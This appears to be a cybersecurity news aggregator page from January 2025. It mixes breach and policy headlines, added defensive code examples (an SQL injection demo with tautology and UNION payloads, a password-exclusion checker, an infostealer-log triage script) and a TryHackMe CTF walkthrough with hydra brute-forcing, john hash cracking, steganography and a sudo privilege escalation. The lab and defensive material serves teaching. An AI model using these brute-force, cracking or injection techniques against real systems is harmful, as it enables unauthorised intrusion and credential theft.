The consequences of BPH’s involvement in cybercrime are damaging, with Australian businesses and individuals often finding themselves targeted by cybercriminals using these services. Ransomware attacks, data extortion, and the theft of sensitive customer information are just some of the incidents that have been traced back to BPH providers.
The presence of these illicit services is not only a local problem but a global one. As these networks expand and evolve, they provide cybercriminals with an easy-to-use platform to launch attacks on a global scale. A single BPH provider can facilitate the activities of hundreds or even thousands of cybercriminals, allowing them to target victims across the globe.
Collaborative Efforts to Combat Cybercrime
In response to this growing threat, law enforcement agencies, including the ACSC, have been stepping up their efforts to identify and dismantle BPH providers. Through enhanced collaboration with global law enforcement, governments, and private sector cybersecurity experts, authorities are targeting these malicious services with increasing frequency. This collective effort aims to disrupt the underlying infrastructure that allows cybercriminals to thrive while complicating their ability to operate securely.
One of the primary methods being employed to target BPH providers is defensive measures, such as proactively blocking internet traffic originating from known BPH services. By identifying and isolating the infrastructure that facilitates cybercrime, investigators can reduce the impact of cybercriminal activities on Australian networks and businesses. In addition, legitimate ISPs and upstream infrastructure providers are being encouraged to adopt practices that prevent BPH providers from accessing their networks.
While BPH providers are a crucial part of the Cybercrime-as-a-Service landscape, they are not the only providers enabling malicious cyber activities. Other illicit services in this underground ecosystem allow cybercriminals to purchase malware, tools for evading security measures, and access to compromised networks. The removal of these services is critical to dismantling the cybercriminal ecosystem and reducing the scope of attacks targeting Australia.
Conclusion
The Australian Cyber Security Centre's efforts to target Bulletproof Hosting Providers (BPH) highlight the need for a coordinated approach to disrupt the infrastructure enabling cybercrime. By addressing vulnerabilities in BPH services, authorities can disrupt cybercriminal operations and bolster overall cybersecurity resilience.
Australia's organizations are urged to stay vigilant by updating software, strengthening security protocols, and using multi-layered defenses. Collaboration with law enforcement and cybersecurity experts is essential for detecting and preventing attacks from BPH providers. To further protect against cyber threats, Cyble, a leader in threat intelligence, offers AI-powered solutions like Cyble Vision to provide real-time insights and enhance cybersecurity efforts. By integrating Cyble’s tools, businesses can strengthen their defenses and stay protected against cybercriminals.
by CYBLE
2025-01-22 10:30:42
ASUS Adds AdGuard DNS to Wi-Fi 7 Routers for Ad Blocking
ASUS has announced the integration of AdGuard DNS as a built-in feature in its Wi-Fi 7-compatible routers, a move aimed at bolstering user security and privacy. The integration allows ASUS users to access AdGuard's ad-blocking and anti-tracking services at the router level, potentially reducing online threats and improving browsing experiences. The decision to integrate AdGuard …
by Cyber Insider
2025-01-22 10:28:54
What is SQL injection (SQLi), and how can it be prevented?
Know what SQL injection is, so your business can understand, prevent and defend against these common yet often overlooked security attacks.
by ThreatDown
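The item above only names the problem; the following added example (written for this page, not code from ThreatDown) shows the two halves a practitioner wants side by side: a lookup that splices user input into the SQL text, and the same lookup with a bound parameter. The table, the fictional accounts and the two payloads are constructed here so that it runs offline against SQLite.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample table with fictional accounts so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT, is_admin INTEGER)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "alice@example.com", 1), ("bob", "bob@example.com", 0)],
    )
    conn.commit()
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, username: str) -> list:
    """Vulnerable: the input is spliced into the SQL text, so a quote in the
    input closes the string literal and everything after it is parsed as SQL."""
    sql = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, username: str) -> list:
    """Hardened: the value travels as a bound parameter. The driver never lets
    it become SQL syntax, so an injection payload is just a username that
    matches no row."""
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


# Two classic payloads: one widens the WHERE clause to every row, the other
# appends a UNION that reads the schema out of sqlite_master.
TAUTOLOGY = "' OR '1'='1"
UNION_DUMP = "x' UNION SELECT name, sql FROM sqlite_master --"

if __name__ == "__main__":
    conn = build_db()
    for payload in (TAUTOLOGY, UNION_DUMP):
        print("payload:   ", payload)
        print("vulnerable:", vulnerable_lookup(conn, payload))
        print("safe:      ", safe_lookup(conn, payload))
```

The same rule carries over to any driver: the query text must be fixed at the point where the statement is prepared, and every user-controlled value must arrive through a placeholder. Table and column names cannot be bound this way, so if those come from user input they need an allow-list instead.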
2025-01-22 10:19:04
Windows 11 24H2 now also offered to all eligible Windows 10 PCs
Microsoft says Windows 11 24H2 has entered the broad deployment phase and is now available to all seekers via Windows Update. [...]
by BleepingComputer
2025-01-22 10:11:48
IPany VPN breached in supply-chain attack to push custom malware
South Korean VPN provider IPany was breached in a supply chain attack by the "PlushDaemon" China-aligned hacking group, who compromised the company's VPN installer to deploy the custom 'SlowStepper' malware. [...]
by BleepingComputer
2025-01-22 10:00:10
Use this AI chatbot prompt to create a password-exclusion list
Creating a custom password-exclusion list can help prevent employees from using passwords that are likely to be guessed. Learn from Specops Software on using AI to generate a password dictionary for securing your organization's credentials. [...]
by BleepingComputer
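An exclusion list only pays off if the check that consumes it catches the trivial variants users reach for ("Acme2025!", "P@ssw0rd"). The added example below is written for this page and is not Specops Software's code or the article's prompt; the fictional company "Acme", its terms, and the leet-substitution table are assumptions standing in for whatever a generated dictionary would contain.

```python
import re

# Constructed sample exclusion list for a fictional company "Acme" in
# "Springfield"; a generated dictionary for a real organisation would hold
# the same kinds of terms. None of these come from the article.
EXCLUSION_LIST = (
    "acme", "acmecorp", "widget",          # company and product names
    "springfield",                         # location
    "password", "welcome", "letmein",      # generic favourites
    "summer", "winter", "spring", "autumn",
)

# Common "leet" substitutions people use to sneak a banned word past an
# exact-match filter. Assumed mapping; extend it for your user population.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a",
                      "5": "s", "7": "t", "@": "a", "$": "s"})


def normalize(candidate: str) -> str:
    """Collapse a password to its alphabetic base word: lower-case it, undo
    leet substitutions, then drop the digits and symbols that remain
    (trailing years, punctuation, separators)."""
    base = candidate.lower().translate(LEET)
    return re.sub(r"[^a-z]", "", base)


def excluded_term(candidate: str, exclusion_list=EXCLUSION_LIST):
    """Return the banned term the password is built around, or None.
    Substring matching is deliberate so that 'MyAcme2025!' is caught too."""
    base = normalize(candidate)
    for term in exclusion_list:
        if term in base:
            return term
    return None


def is_excluded(candidate: str, exclusion_list=EXCLUSION_LIST) -> bool:
    return excluded_term(candidate, exclusion_list) is not None


if __name__ == "__main__":
    for pw in ("Acme2025!", "P@ssw0rd", "W1dget$", "Spr1ngf13ld99", "Tr0ub4dor&3"):
        print(f"{pw:16} -> {excluded_term(pw)}")
```

Normalising the candidate rather than expanding the list keeps the dictionary small and human-reviewable; the trade-off is that very short terms (three or four letters) will produce false positives as substrings, so keep those out of the list or require a word boundary for them.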
2025-01-22 09:50:33
Study: GenAI tools raise risk of sensitive data exposure
The study, which analyzed tens of thousands of prompts, revealed that nearly 8.5% of business users may have disclosed sensitive information, with 46% of these incidents involving customer data such as billing and authentication details.
by SC Media
2025-01-22 09:50:11
Growing risks of payment fraud detailed in 2024 report
The report, prepared by the Insikt Group, the research division of cybersecurity firm Recorded Future, and based on data from dark web sources, e-commerce transactions, and threat actor behavior analysis, identified e-skimming, scam e-commerce websites, and surges in stolen payment data on illegal web marketplaces as drivers of the trend.
by SC Media
2025-01-22 09:43:59
Ratcliffe supports Section 702 amid FISA renewal debate
Addressing the Senate Intelligence Committee, Ratcliffe called the statute “indispensable” for national security, noting that it provides over half of the actionable foreign intelligence used by the president.
by SC Media
2025-01-22 09:39:35
Xona Platform simplifies user access deployment
Xona Systems launched its new Xona Platform. Designed to provide simple user access without allowing insecure user endpoints to connect to critical assets, the platform is redefining how industries such as utilities, oil & gas, and manufacturing approach secure access for remote workers, 3rd parties, and onsite employees. As companies face increasing threats to their critical IT, OT, and cloud-based systems and tighter regulatory compliance mandates, the Xona Platform delivers security and ease of use, offering …
by Help Net Security
2025-01-22 09:39:31
UN Security Council launches 1st discussion tackling commercial spyware
The meeting, which was called for by the United States and 15 other nations, sought to address the proliferation and misuse of government and mercenary spyware.
by SC Media
2025-01-22 09:38:33
Hackers exploit 16 zero-days on first day of Pwn2Own Automotive 2025
On the first day of Pwn2Own Automotive 2025, security researchers exploited 16 unique zero-days and collected $382,750 in cash awards. [...]
by BleepingComputer
2025-01-22 09:37:53
Security concerns raised over Chinese telecom firm Baicells
The company, which operates equipment in each U.S. state and serves over 700 networks, has faced criticism for vulnerabilities in its firmware flagged by the Cybersecurity and Infrastructure Security Agency.
by SC Media
2025-01-22 09:33:37
Cloudflare blocked a record-breaking 5.6 Tbps DDoS attack
Cloudflare announced that it has blocked a record-breaking 5.6 terabit-per-second (Tbps) distributed denial-of-service (DDoS) attack. Cloudflare announced that during the week of Halloween 2024, it autonomously detected and blocked a 5.6 Terabit per second (Tbps) DDoS attack, which is the largest attack ever reported. The previous largest DDoS attack blocked by Cloudflare occurred in October […]
by Security Affairs
2025-01-22 09:24:53
Decades of Toronto District School Board data likely compromised in PowerSchool hack fallout
Aside from the possible compromise of names, birthdates, genders, home addresses, phone numbers, and health card digits, TDSB students enrolled beginning Sep. 2017 may have also had their parent, guardian, or caregiver contact details and certain medical data leaked.
by SC Media
2025-01-22 09:22:49
Disruptions at Conduent linked to third-party breach
"This compromise was quickly contained and our technology environment is currently considered to be free of known malicious activity as confirmed by our third-party security experts," said a Conduent spokesperson, who did not confirm whether the intrusion involved ransomware or data exfiltration.
by SC Media
2025-01-22 09:04:49
New 0-Click Attack Can Geolocate Signal and Discord Users
A 15-year-old security researcher, Daniel (@hackermondev), has disclosed a zero-click deanonymization attack capable of revealing a user's approximate location within a 250-mile radius. The attack exploits content delivery network (CDN) caching mechanisms, particularly Cloudflare's caching infrastructure, and affects widely used platforms such as Signal and Discord. Despite responsible disclosure, responses from affected companies have been …
by Cyber Insider
2025-01-22 09:00:15
EnGenius Cloud Managed ESG320 VPN Router improves security and network performance
EnGenius released the EnGenius Cloud Managed ESG320 VPN Router. Designed to meet the growing demands of small businesses, the ESG320 delivers enterprise-grade performance, security, and simplified cloud-based management, making it the ideal choice for companies looking to optimize their network infrastructure, ensure data protection, and increase operational efficiency.
Comprehensive security with a stateful firewall
Businesses face the challenge of securing their networks from external threats while maintaining smooth operations. The ESG320 Cloud Managed VPN Router addresses this …
by Help Net Security
2025-01-22 08:43:00
Google Cloud links poor credentials to nearly half of all cloud-based attacks
Cloud services with weak credentials were a prime target for attackers, often resulting in lateral movement attempts, a Google Cloud report found.
by Cybersecurity Dive
2025-01-22 08:35:00
DHS disbands existing advisory board memberships, raising questions about CSRB
The Cyber Safety Review Board was investigating the hacks of U.S. telecom firms attributed to the Salt Typhoon threat group.
by Cybersecurity Dive
2025-01-22 08:28:57
Inversion6 launches service to help companies combat cyber threats
Inversion6 launched its new Incident Response (IR) Service, a comprehensive offering to help organizations effectively manage, mitigate and recover from cybersecurity incidents. “Our new service empowers businesses to respond to incidents with speed and precision, safeguarding their operations and reputation,” said Matt Kennedy, CEO of Inversion6. With threats such as ransomware, business email compromise (BEC), and advanced persistent threats (APT) on the rise, Inversion6 provides expert-led solutions to ensure businesses are prepared when every second …
by Help Net Security
2025-01-22 08:15:46
A 7-Zip bug allows attackers to bypass the Mark of the Web (MotW) feature
A vulnerability in the 7-Zip file software allows attackers to bypass the Mark of the Web (MotW) Windows security feature. Attackers can exploit a vulnerability, tracked as CVE-2025-0411, in the free, open-source file archiver software 7-Zip to bypass the Mark of the Web (MotW) Windows security feature. Mark of the Web (MotW) is a security […]
by Security Affairs
2025-01-22 08:12:57
Cyble Finds Thousands of Security Vendor Credentials on Dark Web
Overview
Account credentials from some of the largest cybersecurity vendors can be found on the dark web, a result of the growing problem of infostealers, according to an analysis of Cyble threat intelligence data. The credentials, available for as little as $10 in cybercrime marketplaces, span internal accounts and customer access across web and cloud environments, including internal security company enterprise and development environments that could pose substantial risks. The accounts ideally would have been protected by multifactor authentication (MFA), which would have made any attack more difficult. However, the leaked credentials underscore the importance of dark web monitoring as an early warning system for keeping such leaks from becoming much bigger cyberattacks.
Leaked Security Company Credentials
Leaked credentials have an inherent time value (the older the credentials, the more likely the password has been changed), so Cyble researchers looked only at credentials leaked since the start of the year. Cyble looked at 13 of the largest enterprise security vendors, along with some of the bigger consumer security companies, and found credentials from all of them on the dark web. The credentials were likely pulled from infostealer logs and then sold in bulk on cybercrime marketplaces. Most of the credentials appear to be customer credentials that protect access to sensitive management and account interfaces, but all the security vendors Cyble examined had access to internal systems leaked on the dark web, too. Security vendors had credentials leaked to potentially critical internal systems such as Okta, Jira, GitHub, AWS, Microsoft Online, Salesforce, SolarWinds, Box, WordPress, Oracle, and Zoom, plus several other password managers, authentication systems, and device management platforms.
Cyble did not attempt to determine whether any of the credentials were valid, but many were for easily accessible web console interfaces, SSO logins, and other web-facing account access points. The vendors Cyble looked at included a range of network and cloud security providers, including some of the biggest makers of SIEM systems, EDR tools, and firewalls. All have had data exposures just since the start of the year that ideally were addressed quickly, or at least required additional authentication steps for access. One of the largest security vendors Cyble looked at may have more sensitive accounts exposed, as company email addresses are listed among the credentials for several sensitive accounts, including developer and product account interfaces and customer data. Depending on the privileges granted to those accounts, the exposure could be substantial.
Credential Leaks Could Aid in Hacker Reconnaissance
Even if all the exposed accounts were protected by other means, as ideally they were, such leaks are concerning for one other reason: they can help threat actors conduct reconnaissance by giving them an idea of the systems that a potential target uses, including locations of sensitive data and potential vulnerabilities to exploit. Other sensitive information exposed by infostealers could include URLs of management interfaces that are unknown to the public, which would give hackers further recon information.
Conclusion: Dark Web Monitoring is Critical for Everyone
Dark web monitoring is an underappreciated and cost-effective security tool for one very big reason: credential leaks frequently come before much bigger security incidents like data breaches and ransomware attacks. Leaked credentials for security tools and other important systems are important to monitor not only to prevent breaches but also to keep hackers from learning important information about an organization's systems and how to access them.
If the largest security vendors can be hit by infostealers, so can any organization. Basic cybersecurity practices like MFA, zero trust, vulnerability management, and network segmentation are important for minimizing, and ideally preventing, data breaches, ransomware, and other cyberattacks.
Update 1:18 a.m. UTC January 23, 2025: After a few vendors reached out to Cyble, the decision was made to redact the affected vendor names to preserve confidentiality.
by CYBLE
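The article's two operational points, that leaked credentials lose value with age and that a hit on an SSO, source-control or cloud console login is worth more than one on a random website, are easy to turn into triage logic. The added example below is written for this page and is not Cyble's tooling or feed format: the "url|login|password|first_seen" layout, the fictional records, the monitored domain example.com and the sensitive-host table are all assumptions.

```python
from dataclasses import dataclass
from datetime import date
from urllib.parse import urlparse

# Constructed sample records in an assumed "url|login|password|first_seen"
# shape. Infostealer dumps are sold in many layouts; this one is a stand-in,
# and every record here is fictional (not taken from Cyble's data).
SAMPLE_LOG = """\
https://example.okta.com/login/login.htm|jdoe@example.com|Winter2024!|2025-01-14
https://github.com/login|devops@example.com|hunter2|2025-01-09
https://console.aws.amazon.com/console/home|ops@example.com|Aw5Console#|2024-11-02
https://example.atlassian.net/login|pm@example.com|Jira123|2025-01-16
https://app.slack.com/signin|someone@other.org|letmein|2025-01-10
this line is not a record
"""

MONITORED_DOMAINS = {"example.com"}  # assumed: the organisation's own e-mail/SSO domain
SENSITIVE_HOSTS = {                   # assumed: hosts whose console access is high-value
    "example.okta.com": "sso",
    "github.com": "source-control",
    "console.aws.amazon.com": "cloud-console",
    "example.atlassian.net": "ticketing",
}


@dataclass(frozen=True)
class Record:
    host: str
    login: str
    seen: date


def parse_record(line: str):
    """Parse one dump line; return None for junk instead of raising, because
    real dumps are full of it. The password column is read but deliberately
    not kept: an alert must not re-spread the secret it is warning about."""
    parts = line.strip().split("|")
    if len(parts) != 4:
        return None
    url, login, _password, seen = parts
    host = urlparse(url).hostname
    if not host:
        return None
    try:
        return Record(host.lower(), login.strip().lower(), date.fromisoformat(seen))
    except ValueError:
        return None


def triage(log_text: str, since, monitored=MONITORED_DOMAINS, sensitive=SENSITIVE_HOSTS):
    """Alert on credentials whose login belongs to a monitored domain and that
    were first seen on or after `since` (an ISO date string or a date).
    Older hits are dropped on the article's time-value argument: the password
    has probably been rotated. Sensitive hosts sort first, oldest first within
    a category, so SSO and cloud-console exposure tops the analyst's queue."""
    if isinstance(since, str):
        since = date.fromisoformat(since)
    alerts = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if rec is None or rec.seen < since:
            continue
        if rec.login.rpartition("@")[2] not in monitored:
            continue
        alerts.append({
            "login": rec.login,
            "host": rec.host,
            "category": sensitive.get(rec.host, "other"),
            "seen": rec.seen.isoformat(),
        })
    return sorted(alerts, key=lambda a: (a["category"] == "other", a["seen"]))


if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG, since="2025-01-01"):
        print(alert)
```

Matching on the login's domain rather than on the URL is what catches the article's recon concern: a corporate address appearing against a host you did not know staff used is itself a finding, even when the password is stale. Feed the `host` values that land in "other" back into SENSITIVE_HOSTS as you learn which SaaS consoles matter.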
2025-01-22 08:11:00
PowerSchool data breach brings claims of negligence, poor cyber hygiene
The K-12 software company is facing legal pushback and criticism following a cyberattack that impacted a still unknown number of districts.
by Cybersecurity Dive
2025-01-22 08:09:04
Cyberattack Hits PowerSchool, Exposing Personal Data of Students and Staff
PowerSchool, a leading provider of cloud-based software used by schools to manage student information, experienced a cybersecurity incident. The PowerSchool cyberattack, which occurred between December 22 and December 28, 2024, affected several school districts across North America. This cyberattack on school systems involved the unauthorized exportation of personal data from PowerSchool's Student Information System (SIS) through its community-focused customer support portal, PowerSource. In response to the PowerSchool cyberattack, the school has been proactive in providing support to affected schools, students, and educators; while also outlining the steps it is taking to strengthen its security infrastructure.
What Happened During the PowerSchool Cyberattack?
The PowerSchool cyberattack was first detected on December 28, 2024, when PowerSchool became aware of unauthorized access to personal information stored in its SIS. The data was allegedly exported through PowerSource, a customer support portal used by schools and districts for community engagement. Although PowerSchool confirmed the breach, it emphasized that no evidence of malware or continued unauthorized activity had been found within its systems. Importantly, PowerSchool also clarified that the breach did not disrupt any of its services, and there were no reports of other PowerSchool products being affected. The company has maintained that its services continued as normal throughout the investigation, with no operational downtime for its customers.
What Information Was Compromised in this PowerSchool cyberattack?
The information stolen during the PowerSchool cyberattack included a range of personal data, particularly affecting students and educators. The compromised information during the PowerSchool cyberattack may have included names, contact details, dates of birth, Social Security numbers (SSNs), and medical alerts, as well as other related data. The exact data involved in each case varied depending on the specific requirements of the school districts using PowerSchool.
For students, the breach potentially impacted data such as:
- Full names
- Contact information
- Date of birth
- Health-related information (such as allergies, conditions, and injuries)
- Social Security numbers (SSNs)
- Residential information
In addition, educators' personal information, including names, dates of birth, and SSNs, was also affected by the breach. However, PowerSchool confirmed that no financial or banking data, including credit card information, was involved in the incident.
Steps Taken to Address the PowerSchool Cyberattack
As soon as the breach was discovered, PowerSchool implemented its cybersecurity response protocols, engaging third-party cybersecurity experts to investigate the scope of the incident. A cross-functional response team, including senior leadership, was mobilized to assess the breach and work with affected school districts. PowerSchool has been transparent about the steps it is taking to mitigate the impact of the cyberattack and protect the personal information of affected individuals. One of the key measures the company introduced is the offering of complimentary identity protection services and credit monitoring for all impacted students and educators.
Identity Protection: PowerSchool is offering two years of free identity protection services to all students and educators whose information was involved in the breach. This service will help monitor and prevent potential identity theft.
Credit Monitoring: For adult students and educators, PowerSchool is offering two years of complimentary credit monitoring services. This service aims to protect individuals whose SSNs were potentially exposed.
Additionally, PowerSchool has worked with Experian, a reputable credit reporting agency, to manage the identity protection and credit monitoring services. Notifications will be sent to affected students and educators, with PowerSchool coordinating the outreach through direct emails and public notices.
How Schools and Districts Are Responding to the Breach
Various school districts across North America, including the Toronto District School Board (TDSB), have provided updates to their communities. TDSB, which uses PowerSchool’s SIS, confirmed that the breach involved data from students who attended the district between September 1, 1985, and December 28, 2024. The data compromised in the PowerSchool cyberattack included personal details such as health card numbers, student IDs, medical information, and addresses. The breach was reported to regulatory authorities, including the Office of the Information and Privacy Commissioner of Ontario (IPC), which has launched an investigation into the matter. TDSB assured parents and guardians that there is no ongoing threat to its systems, and the incident has been contained.
Conclusion
The PowerSchool cyberattack highlights the critical need for stronger cybersecurity in schools as they increasingly rely on digital platforms. While PowerSchool has taken steps to address the breach, the incident emphasizes the importance of protecting sensitive student and educator data. Schools must prioritize better security measures and remain vigilant to prevent future breaches, ensuring the safety of personal information.
by The Cyber Express
2025-01-22 08:00:00
SonicWall CVE-2024-53704: SSL VPN Session Hijacking
Bishop Fox researchers have successfully exploited CVE-2024-53704, an authentication bypass affecting the SSL VPN component of unpatched SonicWall firewalls.
by Bishop Fox
2025-01-22 07:35:52
Trump’s Team Removes TSA Leader Pekoske as Cyber Threats Intensify
David Pekoske, the Administrator of the Transportation Security Administration (TSA), was removed from his position by the Trump administration. Pekoske, who had been appointed by former President Donald Trump in 2017 and had his tenure renewed by President Joe Biden in 2022, sent a farewell memo to TSA staff, explaining that he had been advised by Trump’s transition team that his time at the helm would end at noon on Monday.
In his message to staff, David Pekoske praised the commitment of TSA employees, noting the tremendous responsibility they carry to ensure safe travel and the delivery of goods across the United States. “People place their trust in you no matter what your job is in TSA, so they can travel, and the goods they rely on can reach them via our transportation systems,” he wrote. “It’s an incredible responsibility that each of you has been entrusted with, and you carry it out in a manner that is an example of the best of America.”
While Pekoske’s departure was confirmed by the Department of Homeland Security on Tuesday, the agency did not disclose who would replace him. The Cyber Express's requests for comment directed to the White House went unanswered. Notably, David Pekoske’s farewell memo did not mention the reason behind his sudden removal, leaving many to speculate about the circumstances.
(Image source: X)

David Pekoske’s Leadership and Cybersecurity Achievements
Pekoske’s time at the TSA was marked by significant efforts to address cybersecurity in the critical infrastructure sectors under his jurisdiction. His tenure included the implementation of cybersecurity directives for the airline, pipeline, and rail industries, a move that was seen as vital for protecting U.S. transportation and energy systems against growing digital threats.
Under Pekoske’s leadership, the TSA played an essential role in improving cybersecurity measures in response to growing concerns about cyberattacks from adversarial nations like China and Russia. One of Pekoske’s key initiatives was the introduction of cybersecurity rules that focused on fundamental yet critical tasks for organizations in these sectors, such as reporting cyber incidents, establishing cybersecurity coordinators, and developing incident response plans. These regulations were designed to bring sectors up to minimum cybersecurity standards and to help mitigate the risks posed by cybercriminals.
Following the devastating ransomware attack on Colonial Pipeline in 2021, the Biden administration pushed for more robust cybersecurity measures. Pekoske became a central figure in these efforts, contributing to some of the most impactful cybersecurity initiatives of the administration. By October 2024, nearly 100% of critical pipelines and 68% of railways were meeting the minimum cybersecurity standards, a testament to the success of the regulations he championed. In the aviation sector, the percentage of organizations meeting basic cybersecurity standards jumped from 0% to 57% under his watch.
Pekoske was also vocal about the evolving cyber threats and the urgency of coordinated action. At the DEF CON security conference in 2023, he emphasized TSA’s role in quickly responding to emerging threats and issuing emergency directives. He noted that the intelligence gathered from security officials regarding cyber threats was consistently growing more concerning, particularly from nations like China and Russia. “You don’t issue emergency amendments to a security plan unless you feel like you are in an emergency situation,” Pekoske said at the time. “The intelligence we’re getting is consistent. It’s getting consistently more concerning over time.”

Cybersecurity Landscape and the Role of TSA
The TSA’s increasing focus on cybersecurity reflects the growing importance of digital security across all industries, especially in sectors critical to national infrastructure. Pekoske’s tenure marked a shift in the TSA’s role, with the agency expanding its cybersecurity scope to address emerging threats in an interconnected world. As digital attacks become more sophisticated, agencies like the TSA are required to adapt quickly and implement measures that protect both physical and digital assets.
In the context of the broader U.S. cybersecurity efforts, Pekoske’s work with TSA was part of an ongoing national conversation about how to better safeguard U.S. infrastructure. Under the Biden administration, significant strides were made to bolster defenses against foreign cyberattacks, particularly from China. Pekoske’s efforts were in line with these priorities, helping create a safer environment for critical industries such as transportation, energy, and aviation. However, his departure, coming amidst rising cyber threats, has left some questioning what the future holds for TSA’s cybersecurity efforts. While the White House has yet to comment on his replacement, the timing of his removal has raised eyebrows, particularly given the critical cybersecurity challenges facing the U.S.

Cybersecurity Concerns Under the Biden Administration
Pekoske’s exit follows closely on the heels of the resignation of Anne Neuberger, a key figure in the Biden administration’s efforts to combat cyber threats, particularly those originating from China, and coincided with the dismissal of Homeland Security advisory committee members, including the Cyber Safety Review Board that had investigated Microsoft security lapses and was looking into the Salt Typhoon telecom hacks. Neuberger’s resignation, announced on January 17, 2025, sparked discussions about the direction of the U.S. government’s cybersecurity policies. Neuberger’s leadership was instrumental in addressing cyberattacks targeting U.S. infrastructure, including power grids, communication systems, and other critical sectors. Her departure came at a time when the U.S. was facing an escalation of cybercrime, particularly attacks linked to Chinese state-sponsored actors. Under Neuberger’s guidance, the Biden administration had made significant strides in addressing these threats, with a focus on securing vulnerable infrastructure and strengthening the nation’s overall cybersecurity posture.
The combined exits of Pekoske and Neuberger highlight the ongoing challenges the U.S. faces in combating cyber threats, which have become a central concern for national security. As these shifts occur, cybersecurity professionals are left to wonder what the future holds for the country’s efforts to protect its digital and physical infrastructure from increasing cyberattacks.
by The Cyber Express
2025-01-22 07:00:00
Mandatory MFA, Biometrics Make Headway in Middle East, Africa
Despite lagging in technology adoption, African and Middle Eastern organizations are catching up, driven by smartphone acceptance and national identity systems.
by Dark Reading
2025-01-22 06:52:15
Agent Sudo CTF — TryHackMe Writeup
A secret server is located under the deep sea; hack and reveal the truth.
You found a secret server located deep under the sea. Your mission? Hack inside the server and reveal the hidden truth. This walkthrough will guide you through the process step-by-step, from enumeration to privilege escalation.

1. Enumeration
Target IP: 10.10.165.175
To start, I ran an Nmap scan on the target, revealing three open ports:
nmap 10.10.165.175 -v
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

Homepage Clue
Visiting http://10.10.165.175/ revealed the following message:
Dear agents,
Use your own codename as user-agent to access the site.
From,
Agent R
The codename likely refers to a user-agent string, possibly one letter of the alphabet (Agent A to Z). To test this hypothesis, I used Burp Suite's Intruder to brute-force user-agent strings.
(Screenshot: Using Burp Suite)
I inserted payloads A to Z in the User-Agent header and sent them through Intruder.
(Screenshot: Intruder in Burp Suite)
The response lengths for C and R are different: shorter for C and longer for R. On analysis, I found that R returns more content:
What are you doing! Are you one of the 25 employees? If not, I going to report this incident
Dear agents,
Use your own codename as user-agent to access the site.
From,
Agent R
But in the case of C, the status code is `302` and the location is `Location: agent_C_attention.php`.
(Screenshot: Response for user-agent: C)
Now visit the location we found:
Attention chris,
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak!
From,
Agent R
The agent name is `chris` and it says the password is weak.

2. Attacking
Let's try cracking the password for user chris over FTP. We will use hydra for the attack and rockyou.txt as the password list.
FTP Login
hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.165.175 ftp
(Screenshot: FTP password attack)
After the successful login to FTP, we got:
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
226 Directory send OK.
All the files were downloaded with the simple `get` command.
The message says that the password is stored inside the image, so we need to apply steganography.
❯ cat To_agentJ.txt
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C

Steganography
Now, using `binwalk` to get info on what is found:
❯ binwalk cute-alien.jpg
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
❯ binwalk cutie.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820 0x8804 End of Zip archive, footer length: 22
Now, extracting cutie.png using `binwalk -e cutie.png`, we have the files 365, 365.zlib and 8702.zip; the zip is important and is password protected.
I used John the Ripper to crack the zip's password, first creating the hash and then cracking it:
❯ zip2john 8702.zip > zip_pass.hash
❯ john --wordlist=/usr/share/wordlists/rockyou.txt zip_pass.hash
.............
Press 'q' or Ctrl-C to abort, almost any other key for status
ali** (8702.zip/To_agentR.txt)
1g 0:00:00:00 DONE (2024-10-08 17:45) 1.162g/s 28576p/s 28576c/s 28576C/s christal..280789
Session completed
Now we have the zip password; extract it. Inside was a message:
Agent C,
We need to send the picture to 'QXJlYTUx' as soon as possible!
By,
Agent R
Here `QXJlYTUx` is encoded; let's decode it using base64:
echo 'QXJlYTUx' | base64 -d
Area**
Now look into cute-alien.jpg using `steghide`. After the command `steghide --info cute-alien.jpg`, we found that the `message.txt` file is embedded there.
Finally, using steghide, I extracted the hidden message from cute-alien.jpg:
steghide --extract -sf cute-alien.jpg
❯ cat message.txt
Hi jam**,
Glad you find this message. Your login password is hacker******
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris

3. Capture the Flag
I used the credentials to SSH into the server:
ssh jam**@10.10.165.175
After logging in, I captured the user flag.
(Screenshot: Capturing user flag)
To find out the incident behind the photo `Alien_autospy.jpg`, we need to download it (for example using scp) and search on Google:
scp jam**@10.10.165.175:/home/jam**/Alien_autospy.jpg .
By searching, we found the image is from `Roswell`.

4. Privilege Escalation
Running sudo -l revealed that the user could run /bin/bash as sudo. The sudo version (1.8.21p2) was vulnerable to CVE-2019-14***. Using an exploit from Exploit-DB, I escalated privileges to root:
sudo ***** /bin/bash
After successfully gaining root access, I retrieved the root flag.
(Screenshot: Capturing root flag)
The final message from Agent R is:
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
By,
Des*** a.k.a Agent R
This was a fun and insightful challenge that covered enumeration, brute-forcing, steganography, and privilege escalation.
Happy hackers! Happy Hacking!!
Agent Sudo CTF — TryHackMe Writeup was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2025-01-22 06:29:01
